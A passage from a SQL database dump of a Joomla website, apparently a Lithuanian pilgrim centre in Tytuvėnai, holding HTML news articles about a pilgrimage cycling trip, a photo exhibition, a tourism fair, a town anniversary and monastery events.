0px; display: inline !important; float: none; background-color: #ffffff;\">Dviratininkams ypač patiko jauki Kurtuvėnų regioninio parko trasa. Lekiant kalvotu reljefu per įspūdingo grožio mišką apima nuostabūs jausmai. Visi trasą baigė su šypsena ir pasikrovę gamtos energijos. Šis takas iki Kurtuvėnų dvaro sodybos ir Kurtuvėnų regioninio parko lankytojų centro (Parko g. 2, 80223 Kurtuvėnai) tęsiasi apie 6 km.</p>\r\n<p style=\"text-align: justify;\"> </p>\r\n<p style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">Kurtuvėnų regioninio parko lankytojų centras – dar viena turistinė vieta piligriminio „Malonių kelio“ maršrute. Čia įrengtoje ekspozicijoje „Kraštovaizdžio įvairovė“ dviratininkai, vaikščiodami tarp „milžinų“, susipažino su Kurtuvėnų regioninio parko vertybėmis, kraštovaizdžio samprata, sąranga, kaita, išsaugojimu. Lankytojų centre teikiama informacija apie regioniniame parke lankomas vietoves, pažintinius takus, turizmo paslaugas. Čia ne muziejus, o lankytojų centras, tad viską galima ir net būtina liesti – interaktyvios pramogos sudomins ir žingeidžius, ir aktyvų laisvalaikį mėgstančius lankytojus.</p>\r\n<p style=\"text-align: justify;\"> </p>\r\n<p style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">Keliaujant link Kelmės taip pat būtina aplankyti <strong>Palendrių Šv. Benedikto vienuolyną</strong>. Vienuolyno bažnyčia yra atvira visiems, kurie nori melstis kartu su vienuoliais. Pamaldos per dieną čia vyksta net 5 kartus: 7.15 val. rytmetinė; 10.00 val. Eucharistija (Šv. Mišios) su Tercijos pamaldomis; 13.00 val. Sekstos pamaldos; 13.50 val. Nonos pamaldos; 17.30 val. Vakarinė (Mišpariai) (ketvirtadieniais, išskyrus Advento ir Gavėnios laiku: 18.00 val.), 18.00 - 19.15 val. sekmadienį: Švč. Sakramento adoracija; 20.30 val. naktinė. Čia atvykti verta ne tik dėl pamaldų, bet ir dėl unikalios bažnyčios atmosferos bei dieviško vienuolių giedojimo. Šios pamaldos taip pat transliuojamos internetu, informacijos ieškokite <a href=\"http://www.palendriai.lt/\">www.palendriai.lt</a>.</p>\r\n<p style=\"text-align: justify;\"> </p>\r\n<p style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">Po daugiau kaip 40 km važiavimo antrą dieną dviratininkai apsistojo jurtose Panūdžių kaime, Kelmės rajone, prie ežero, pavadinimu Medinis. Poilsis Jurtose – tai gaivus ežero vanduo, grynas pušyno oras, žavingas kraštovaizdis, patogi nakvynė.</p>\r\n<p style=\"text-align: justify;\"> </p>\r\n<p style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">Trečiosios dienos dviratininkų tikslas buvo grįžti ten, kur pradėtas žygis – Šiluvoje. Tačiau prieš tai dar laukė daugiau nei 40 kilometrų kelias dviračiais. Paskutiniąją žygio dieną dviratininkai sustojo <strong>Kelmės Mergelės Marijos Ėmimo į dangų bažnyčioje</strong> (S. Nėries 18, Kelmė), kuri yra viena aukščiausių Lietuvoje – pastato aukštis 80 metrų. Keliautojai taip pat stabtelėjo vietinio menininko Andriaus Seselsko su šeima įkurtoje „AJJU lauko galerijoje“. Tai vienintelė tokia galerija Lietuvoje, kurios viduje teka upelis, tad paveikslus galėsite apžiūrėti stovėdami ant tiltelio. „AJJU galeriją“ rasite atvažiavę iki Dariaus ir Girėno g. 95, Kelmė, o nuo ten pradėkite dairytis į laukus.</p>\r\n<p style=\"text-align: justify;\"> </p>\r\n<p style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">Kelyje iki Lyduvėnų Raseinių rajone taip pat rasite <strong>Maironių koplytėlę</strong>, <strong>Maironių Švč. Mergelės Marijos bažnyčią</strong>, <strong>Lyduvėnų Šv. apaštalų Petro ir Pauliaus bažnyčią</strong>. Nors link Lyduvėnų miestelio pasitiks ne visai malonus žvyro kelias, tačiau važiuosite per įspūdingus Dubysos slėnius, kol galiausiai iš tolo matysite Lyduvėnų geležinkelio tiltą, kuris ilgiausias (599 m) ir aukščiausias (42 m) Lietuvoje. Nuo Lyduvėnų iki Šiluvos dviratininkai dar numynė apie 10 km, kelias čia – asfaltuotas ir lygus, tad labai malonus.</p>\r\n<p style=\"text-align: justify;\"> </p>\r\n<p style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">VšĮ „Atrask Raseinius“ suplanuotą dalį „Malonių kelio“ maršruto įveikę dviratininkai grįžo sveiki. Galbūt dėl to, kad kelias piligriminis ir, kur tik buvo galimybė, dviratininkai meldėsi ir buvo palaiminti sutiktų dvasininkų. Dalis dviratininkų savo kelionę tęsė dviračiais mindami nuo Šiluvos iki Šiaulių ar Raseinių. Kiti automobiliais išvyko namo.</p>\r\n<p style=\"text-align: justify;\"> </p>\r\n<p style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">Dviračių žygį finansavo Šiaulių miesto ir Kelmės, Raseinių, Šiaulių rajonų savivaldybės.</p>\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">Daugiau detalios informacijos apie „Malonių kelią“ rasite interneto svetainėje <a href=\"http://www.maloniukelias.lt/\">www.maloniukelias.lt</a>. <br /></span></p>',1,0,0,44,'2023-07-12 19:58:42',135,'','2023-07-12 20:04:31',135,0,'0000-00-00 00:00:00','2023-07-12 19:58:42','0000-00-00 00:00:00','{\"image_intro\":\"images\\/stories\\/naujienos\\/dviraciu_zygis23\\/main.jpg\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',8,0,5,'','',1,2464,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',1,'*',''),(345,434,'„Lengvi, šilkiniai rūkai“ -  fotografijos paroda','lengvi-silkiniai-rukai-fotografijos-darbu-paroda','','<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">Rugsėjo 13 d. VšĮ \"Tytuvėnų piligrimų centre\" jau trečią kartą vyko susitikimas su Plungės ir Rietavo krašto fotoklubo \"Žybt\" nare, telšiške, fotografijos darbų autore Alina Stonkute - Čapiene.<br /></span></p>\r\n','\r\n<p style=\"text-align: justify;\"><span>{gallery cols=3 orientation=horizontal <span> width=320</span>}stories/naujienos/fotografijos_paroda2020{/gallery}</span></p>\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span><span><span><span><span>Pristatyta fotografijos darbų paroda \"Lengvi, šilkiniai rūkai\" iš ciklo \"Atvirlaiškiai Tau\". Popietėje skambėjo dueto \"Pienės pūkas\" muzika. Savo kūrybos eiles skaitė Plungės literatų klubo \"Vingiorykštė\" pirmininkė Adelė Daukantaitė Šeškauskienė bei poetė Irena Stražinskaitė - Glinskienė. Svečiai turėjo galimybę pasigrožėti ne tik autorės darbais, bet ir išklausyti gidės Rūtos Krencienės pasakojimų vienuolyno \"Rožių sode\". Puikios emocijos, gerai nuotaika, šiltas, jaukus ir nuoširdus bendravimas.</span></span></span></span></span></span></p>',1,0,0,44,'2020-09-14 20:17:41',135,'','2020-09-14 20:22:17',135,0,'0000-00-00 00:00:00','2020-09-14 20:17:41','0000-00-00 00:00:00','{\"image_intro\":\"images\\/stories\\/naujienos\\/fotografijos_paroda2020\\/main\\/main.png\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',9,0,44,'','',1,1553,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',1,'*',''),(341,430,'Lietuvoje svečiuosis kunigas Leo','lietuvoje-sveciuosis-kunigas-leo','','<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">Sausio 10–12 dienomis Lietuvoje svečiuosis kunigas Leo Patalinghug iš JAV. </span></p>\r\n','\r\n<p style=\"text-align: justify;\"><span> <iframe src=\"https://www.youtube.com/embed/G2xIcNU4tMM\" frameborder=\"0\" width=\"853\" height=\"480\"></iframe></span></p>\r\n<p><iframe src=\"https://www.youtube.com/embed/G3sFlgwrb-A\" frameborder=\"0\" width=\"853\" height=\"480\"></iframe></p>',1,0,0,44,'2019-11-19 20:17:42',135,'','2019-11-19 20:18:58',135,0,'0000-00-00 00:00:00','2019-11-19 20:17:42','0000-00-00 00:00:00','{\"image_intro\":\"images\\/stories\\/naujienos\\/leo\\/leo.png\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',4,0,48,'','',1,2574,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',1,'*',''),(342,431,'ADVENTUR 2020','adventur-2020','','<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">Sausio 24-26 dienomis VšĮ \"Tytuvėnų piligrimų centras\" kartu su kitais Kelmės krašto turizmo informacijos centrais dalyvavo didžiausioje Baltijos šalyse specializuotoje tarptautinėje turizmo parodoje ADVENTUR 2020, kurios pagrindinis akcentas - sveikatos turizmas.</span></p>\r\n','\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">VšĮ \"Tytuvėnu piligrimų centras\" lankytojus vaišino sukurtu nauju produktu \"Duonos saldainiais\", kurie susilaukė daug lankytojų dėmesio bei supažindino su aktyviu kūno stiprinimo ir pasyviu dvasinės savijautos poilsiu Tytuvėnų krašte. Pristatytos įvairios sveiką gyvenseną skatinančios laisvalaikio galimybės Kelmės krašte, turizmo maršrutai, edukacijos. </span></p>\r\n<p style=\"text-align: justify;\"><span>{gallery cols=3 orientation=horizontal width=370}stories/naujienos/adventure2020/pics{/gallery}</span></p>',1,0,0,44,'2020-01-29 19:28:12',135,'','2020-01-29 19:32:04',135,0,'0000-00-00 00:00:00','2020-01-29 19:28:12','0000-00-00 00:00:00','{\"image_intro\":\"images\\/stories\\/naujienos\\/adventure2020\\/main.jpg\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',9,0,47,'','',1,2503,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',1,'*',''),(357,446,'Tytuvėnams – 725!','tytuvenams-725','','<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">Tytuvėnų  725 –ų metų jubiliejaus renginiai.</span></p>\r\n','\r\n<p><img src=\"images/stories/naujienos/tytuvenai725/1ok.jpg\" border=\"0\" alt=\"\" /></p>\r\n<p><img src=\"images/stories/naujienos/tytuvenai725/2ok.jpg\" border=\"0\" alt=\"\" /></p>\r\n<p><img src=\"images/stories/naujienos/tytuvenai725/3ok.jpg\" border=\"0\" alt=\"\" /></p>\r\n<p><img src=\"images/stories/naujienos/tytuvenai725/4ok.jpg\" border=\"0\" alt=\"\" /></p>\r\n<p><img src=\"images/stories/naujienos/tytuvenai725/5ok.jpg\" border=\"0\" alt=\"\" /></p>\r\n<p><img src=\"images/stories/naujienos/tytuvenai725/6ok.jpg\" border=\"0\" alt=\"\" /></p>',1,0,0,44,'2021-08-10 20:11:58',135,'','0000-00-00 00:00:00',0,0,'0000-00-00 00:00:00','2021-08-10 20:11:58','0000-00-00 00:00:00','{\"image_intro\":\"images\\/stories\\/naujienos\\/tytuvenai725\\/main.jpg\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',1,0,32,'','',1,1240,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',1,'*',''),(344,433,'ŠEIMŲ ŠVENTĖ „ROŽIŲ SODE“','seimu-svente-roziu-sode','','<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">Rugpjūčio 15 d. VšĮ „Tytuvėnų piligrimų centras“ kvietė šeimas, bendruomenę, miesto svečius Žolinę švęsti „Rožių sode“. <br /></span></p>\r\n','\r\n<p style=\"text-align: justify;\"><span>{gallery cols=3 orientation=horizontal <span> width=350</span>}stories/naujienos/zolines2019{/gallery}</span></p>\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span><span><span><span><span>Renginys prasidėjo Švč. Mergelės Marijos Ėmimo į dangų iškilmėmis Tytuvėnų bažnyčioje. Šv. Mišiose buvo laiminami žolynai. Vėliau renginys persikėlė į Tytuvėnų vienuolyno „Rožių sodą“, kuriame koncertavo ir svečius linksmino grupė „Bonus“. Didelio dėmesio ir gausaus vaikų būrio, emocijų ir krykštavimo sulaukė atrakcija vaikams ir suaugusiems „Putų šou“. Visą dieną vienuolyno Noviciato kiemelyje buvo galima žaisti rankų darbo lauko žaidimais: šaškėmis, „laivų mūšis“, kaladėlių bokštu ir kitais.</span></span></span></span></span></span></p>\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span><span><span><span><span>Renginio metu l. e. p. direktorė Sandra Sabaliauskienė padėkojo ir įteikė atminimo dovanėles šio renginio rėmėjams, organizatoriams: Tytuvėnų seniūnijai, Tytuvėnų gimnazijai, Tytuvėnų parapijai. Tikimąsi, kad ši šventė „Rožių sode“ taps tradicine šeimų švente ir ateityje.</span></span></span></span></span></span></p>\r\n<p align=\"center\"><iframe src=\"https://www.youtube.com/embed/aAiOlPzDwvw\" frameborder=\"0\" width=\"949\" height=\"534\"></iframe></p>',1,0,0,44,'2020-08-18 18:32:06',135,'','2020-08-18 18:52:31',135,0,'0000-00-00 00:00:00','2020-08-18 18:32:06','0000-00-00 00:00:00','{\"image_intro\":\"images\\/stories\\/naujienos\\/zolines2019\\/main\\/main.jpg\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',12,0,45,'','',1,1854,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',1,'*',''),(346,435,'Edukacija.Vienuolyno paslaptys.Pojūčių terapija','ekskursija-edukacija-vienuolyno-paslaptys-pojuciu-terapija','','<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">Rugsėjo 11-20 dienomis Kelmės rajone vyko „Europos paveldo dienų 2020“ renginiai. Šių metų tema: „Kultūros paveldas ir edukacija“. <br /></span></p>\r\n','\r\n<p style=\"text-align: justify;\"><span>{gallery cols=3 orientation=horizontal <span> width=320</span>}stories/naujienos/vienuolyno_paslaptys{/gallery}</span></p>\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span><span><span><span><span>Tytuvėnų bažnyčios ir vienuolyno ansamblyje vyko renginiai, skirti Europos paveldo dienų paminėjimui: ekskursija–edukacija „Vienuolyno paslaptys. Pojūčių terapija“. Gidė Rūta Krencienė vienuolyno kiemelyje supažindino renginių dalyvius su ansamblio istorija, jo architektūra, svarbiausiais istoriniais momentais. Svečiai susipažino su ansamblio statybos istorija, jo pastatų statybos ypatumais, mūrijimo technologijomis, skirtingų laikotarpių plytų gamybos metodais.</span></span></span></span></span></span><span style=\"font-size: 12.16px;\"><br /></span></p>\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span><span><span><span><span>Po edukacinės ekskursijos lankytojams pasiūlyta užsidėti akių kaukes ir, vadovaujantis tik lytėjimo ir klausos pojūčiais, visi dalyviai palydėti į vienuolyno rūsį. Ten, visiškoje tamsoje dalyviai pasitelkė uoslės receptorius ir turėjo atpažinti įvairių ansamblio apylinkėse augančių žolelių kvapą. </span></span></span></span></span></span></p>\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span><span><span><span><span>Daug puikių emocijų svečiams sukėlė degustacinė vakarienė aklinoje tamsoje, pasitelkiant lytėjimo, uoslės ir skonio receptorius.  Nematydami, tamsoje vakarieniaujantys renginio dalyviai turėjo įvardinti ragaujamų vakarienės patiekalų ingredientus.</span></span></span></span></span></span></p>\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span><span><span><span><span>Tikimės, kad šių metų Europos paveldo dienų renginiuose gimę ir išbandytos idėjos, taps puikia proga pasiūlyti daugiau įvairesnių paslaugų ansamblio lankytojams, taip pat ir siekiantiems patirti išskirtinius pojūčius vakarieniaujant visiškoje tamsoje.</span></span></span></span></span></span></p>',1,0,0,44,'2020-09-21 20:22:30',135,'','2020-09-21 20:27:45',135,0,'0000-00-00 